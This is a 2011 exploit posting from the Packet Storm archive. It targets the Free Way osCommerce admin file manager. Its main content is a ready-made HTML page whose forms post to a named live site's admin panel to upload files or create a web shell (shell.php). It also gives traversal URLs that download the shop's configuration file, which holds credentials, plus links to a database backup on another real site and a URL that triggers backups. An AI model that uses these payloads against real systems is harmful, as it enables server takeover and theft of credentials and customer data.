exploit the possibilities

Free Way osCommerce Shell Upload / File Disclosure

Free Way osCommerce Shell Upload / File Disclosure
Posted Oct 19, 2011
Authored by indoushka

Free Way osCommerce suffers from backup related, file disclosure, and shell upload vulnerabilities.

tags | exploit, shell, vulnerability, info disclosure
MD5 | c7b7c4e04f1b81970736fb3e5679ae8d

Free Way osCommerce Shell Upload / File Disclosure

Change Mirror Download
========================================================
Free Way osCommerce Remote File Upload / File Disclosure
========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0
0 _ ____ ____ _____ __ _____ __ __ 1
1 _| | |__ | |__ | |___ | | | | _ | \ \ / / 0
0 |_ | __| | _| | / / | | | |_| | \ \/ / 1
1 | | |__ | |__ | / / __| | | _ | / / 0
0 | | __| | __| | / / / _ | | | | | / / 1
1 |_| |____| |____| /_/ / [_] | | | | | / / 0
0 Site:1337day.com /_______| |_| |_|/__/ 1
1 Support e-mail : submit[at]inj3ct0r.com 0
0 >> Exploit database separated by exploit 1
1 type (local, remote, DoS, etc.) 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1

#######################################################

# Vendor: http://www.zac-ware.com/

# Author : indoushka

+++=[ Dz Offenders Cr3w ]=+++

# KedAns-Dz * Caddy-Dz * Kalashinkov3

# Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz

# Contact : ind0ushka@hotmail.com

# Tested on : win SP2 + SP3 Fr / Back | Track 5 fr
########################################################################

# Exploit By indoushka
-------------

<html><head><title> creloaded - Remote File Upload </title></head>

<br><br><u>UPLOAD FILE:</u><br>

<form name="file" action="https://secure.superc.com.au/admin/shop_file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data">

<input type="file" name="file_1"><br>

<input name="submit" type="submit" value=" Upload " >

</form>

<br><u>CREATE FILE:</u><br>

<form name="new_file" action="https://secure.superc.com.au/admin/shop_file_manager.php/login.php?action=save" method="post">

FILE NAME:<br>

<input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br>

<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>

<input name="submit" type="submit" value=" Save " >

</form>

# File Disclosure :

in : admin/shop_file_manager.php/login.php?action=download&filename=

Exploit : admin/shop_file_manager.phpp/login.php/login.php?action=download&filename=/includes/_includes_configure.php

Example : http://[site]/[path]/admin/shop_file_manager.php/login.php/login.php?action=download&filename=/includes/_includes_configure.php


By pass Creat Download Backup :

http://jumpingfiestarentals.com/admin/backups/db_freewaydb3-20111019144921.sql

https://secure.superc.com.au/admin/shop_backup.php/login.php?action=backupnow

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net
ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te * ViRuS_HiMa * KedAns-Dz * Over-X
--------------------------------------------------------------------------------------------------------------------------------------

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close